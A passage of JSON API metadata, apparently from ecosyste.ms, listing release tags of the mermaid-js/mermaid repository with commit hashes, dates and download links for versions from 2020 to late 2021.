fests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.8/manifests"},{"name":"8.13.7","sha":"52af0476c14be9f98d669e336a5625f5fb609aee","kind":"commit","published_at":"2021-12-22T20:20:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.7/manifests"},{"name":"8.13.6","sha":"a44714c715e49ff2dc86a401962dc5929b6eca06","kind":"commit","published_at":"2021-12-16T19:06:50.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.6/manifests"},{"name":"real-8.13.5","sha":"7da80812e0510ae04f9ebf3a151a048ef9ce6834","kind":"commit","published_at":"2021-12-08T06:53:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/real-8.13.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/real-8.13.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@real-8.13.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/real-8.13.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/real-8.13.5/manifests"},{"name":"8.13.5","sha":"2ce18ec2a8c6f6c2ece20f749628443ac663119f","kind":"commit","published_at":"2021-12-07T22:09:20.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.5/manifests"},{"name":"8.13.4","sha":"650bcef3d1f940aec0cf4b81d1433b74b5e0f55c","kind":"commit","published_at":"2021-11-18T16:11:17.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.4/manifests"},{"name":"8.13.3","sha":"0d7d5ddc5fbd8482dd7e907d3eef41cd1240f68f","kind":"commit","published_at":"2021-10-14T19:19:28.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.3/manifests"},{"name":"8.13.2","sha":"2758d6477803dd9e5e8975b0d93b33c69be7b377","kind":"commit","published_at":"2021-09-29T18:22:45.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.2/manifests"},{"name":"8.13.1","sha":"029042393c795b4b3ef9c91ae66564610e4b0c89","kind":"commit","published_at":"2021-09-29T18:05:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.1/manifests"},{"name":"8.13.0","sha":"75b79e1b23f288e4706f21f62925c17c676cf4c0","kind":"commit","published_at":"2021-09-29T06:45:07.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.0/manifests"},{"name":"8.12.1","sha":"48b6a32fe19af7e600fb0df900aa5956159e52d7","kind":"commit","published_at":"2021-08-26T17:43:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.12.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.1/manifests"},{"name":"8.12.0","sha":"296a64f465021a8424cd72d495a24f4cc3c59c1e","kind":"commit","published_at":"2021-08-26T17:32:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.12.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.0/manifests"},{"name":"8.11.5","sha":"962998810bccd537365f7de45891ebba48487cde","kind":"commit","published_at":"2021-08-15T15:41:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.5/manifests"},{"name":"8.11.4","sha":"a670b678445f2894844ecbe7352f994396caa518","kind":"commit","published_at":"2021-08-05T17:58:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.4/manifests"},{"name":"8.11.3","sha":"af7f5d0aaf3ede2f2efca6f24ec527c4e7065e2f","kind":"commit","published_at":"2021-08-04T17:25:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.3/manifests"},{"name":"8.11.2","sha":"9245b0bb8b82c200c7c7a277cd619db6e5dd7715","kind":"commit","published_at":"2021-07-29T17:34:51.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.2/manifests"},{"name":"8.11.1","sha":"33e8ee6c0e8bfd03f5d3fee51237a156c2e5a537","kind":"commit","published_at":"2021-07-28T13:54:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.1/manifests"},{"name":"untagged-78173a5e15ffdf8f1e6a","sha":"52b1b23d4753a3d068e19052e5f4d25e88057517","kind":"commit","published_at":"2021-07-15T12:54:54.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-78173a5e15ffdf8f1e6a","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-78173a5e15ffdf8f1e6a","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-78173a5e15ffdf8f1e6a","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-78173a5e15ffdf8f1e6a","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-78173a5e15ffdf8f1e6a/manifests"},{"name":"8.11.0-rc2","sha":"1d782678715699e8485480bff309adc2b648c7c1","kind":"commit","published_at":"2021-06-27T05:57:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.0-rc2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0-rc2/manifests"},{"name":"8.11.0","sha":"eef4ef54a177c96b0efcf1c8c98f8d4d9f454e00","kind":"commit","published_at":"2021-06-25T10:27:21.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0/manifests"},{"name":"untagged-f83ec2a9deaf6677e0c7","sha":"e6e94ad57ea06ef8627bf91ddfbd88f5082952bf","kind":"commit","published_at":"2021-06-05T10:11:13.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-f83ec2a9deaf6677e0c7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-f83ec2a9deaf6677e0c7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-f83ec2a9deaf6677e0c7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f83ec2a9deaf6677e0c7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f83ec2a9deaf6677e0c7/manifests"},{"name":"8.10.1","sha":"417428aceada045eabcc92826c68e08a1329c98f","kind":"commit","published_at":"2021-05-10T16:14:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.10.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.10.1/manifests"},{"name":"8.9.3","sha":"8b3ac57ce7e6ae6ea4a66a9d8a28d8fcde936bb9","kind":"commit","published_at":"2021-04-25T11:24:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.3/manifests"},{"name":"untagged-502e9410f3e7fd2ed484","sha":"45918da48ec99a706aa2b39598ae32cdccf95004","kind":"commit","published_at":"2021-04-25T10:27:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-502e9410f3e7fd2ed484","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-502e9410f3e7fd2ed484","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-502e9410f3e7fd2ed484","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-502e9410f3e7fd2ed484","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-502e9410f3e7fd2ed484/manifests"},{"name":"8.9.2","sha":"a5cc75c1f7b722ebd0c2f848b25e2350655841dd","kind":"commit","published_at":"2021-03-18T20:02:49.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.2/manifests"},{"name":"8.9.1","sha":"be95b93a2d91d62bc8618b906356514232b4343d","kind":"commit","published_at":"2021-02-18T20:41:01.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.1/manifests"},{"name":"8.9.0","sha":"3c5da00230a586843364ff55f909fe27be2c0b41","kind":"tag","published_at":"2021-01-21T18:49:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.0/manifests"},{"name":"v8.8.4","sha":"d6b2bcf0d23af89f65de659d2d7edd32a41ccddc","kind":"tag","published_at":"2020-12-05T13:43:29.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v8.8.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v8.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v8.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v8.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v8.8.4/manifests"},{"name":"8.8.3","sha":"e3cf8b78437bb542029e91a022c81fbd4d361e6a","kind":"commit","published_at":"2020-11-05T19:09:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.3/manifests"},{"name":"8.8.2","sha":"0f9da18cbe9bea6021ab78553902e5a1a517d61a","kind":"commit","published_at":"2020-10-08T17:48:33.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.2/manifests"},{"name":"8.8.1","sha":"4dc805d25add19ae07ac9fe8951b4036332e0530","kind":"commit","published_at":"2020-09-30T17:23:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.1/manifests"},{"name":"8.8.0","sha":"0918b97e815ad77e8b8e88ebb52400937f197885","kind":"commit","published_at":"2020-09-05T07:46:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.0/manifests"},{"name":"8.7.0","sha":"4c38b1a776d83a00e12dd820b1bee455c3954e3c","kind":"commit","published_at":"2020-08-09T12:03:20.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.7.0/manifests"},{"name":"8.6.4","sha":"95b7e4f9adc560dfd2ec6cc2b1f43397b2641012","kind":"commit","published_at":"2020-07-26T12:09:48.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.4/manifests"},{"name":"8.6.3","sha":"d12b197ec951fa74574b4ef9fb95a55881cdd7a9","kind":"commit","published_at":"2020-07-24T06:28:14.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.3/manifests"},{"name":"8.6.2","sha":"f68536357415d16b239e04a98e6195227399557e","kind":"commit","published_at":"2020-07-22T17:22:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.2/manifests"},{"name":"8.6.0","sha":"b4203992bf98c209a578b1139c44d107b708ca6c","kind":"commit","published_at":"2020-07-13T14:42:10.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.0/manifests"},{"name":"8.5.2","sha":"e9e5c75decbd5f5bdcf6c9d63c8f8f553263f6e2","kind":"commit","published_at":"2020-06-07T08:39:21.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.5.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.2/manifests"},{"name":"8.5.1","sha":"9470a4f1edc0d0d5b8398e2c41029895fa5f738a","kind":"tag","published_at":"2020-05-17T08:12:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.5.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.1/manifests"},{"name":"untagged-566ebfbf21141b604025","sha":"0ac48a431a319b2ff7aaaef889ddd53f153acc6d","kind":"commit","published_at":"2020-05-13T17:32:56.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-566ebfbf21141b604025","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-566ebfbf21141b604025","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-566ebfbf21141b604025","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-566ebfbf21141b604025","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-566ebfbf21141b604025/manifests"},{"name":"untagged-31c93788afe260d914bb","sha":"5bdffd7d20c5622540c691ba63f635b8eedabf40","kind":"commit","published_at":"2020-04-11T16:10:53.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-31c93788afe260d914bb","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-31c93788afe260d914bb","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-31c93788afe260d914bb","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-31c93788afe260d914bb","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-31c93788afe260d914bb/manifests"},{"name":"8.4.8","sha":"1c07e550bb5fee590f69a1f7892e481a2cf53cff","kind":"commit","published_at":"2020-02-21T09:23:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.8/manifests"},{"name":"untagged-7651dabb407ecd5631ce","sha":"98229a47b298f4124d88347edbd56357866df7ee","kind":"commit","published_at":"2020-02-16T11:46:23.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-7651dabb407ecd5631ce","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-7651dabb407ecd5631ce","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-7651dabb407ecd5631ce","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-7651dabb407ecd5631ce","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-7651dabb407ecd5631ce/manifests"},{"name":"8.4.6","sha":"4805394e612c836bf27710794ce6f9aa86b7ac60","kind":"tag","published_at":"2020-01-22T18:53:54.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.6/manifests"},{"name":"untagged-f43366252632a1a42020","sha":"e0d16dcb22333f967e172e1f5b78af4baf6c0eff","kind":"commit","published_at":"2020-01-11T09:07:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-f43366252632a1a42020","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-f43366252632a1a42020","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-f43366252632a1a42020","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f43366252632a1a42020","manifests_url":"https://repos.ecosyst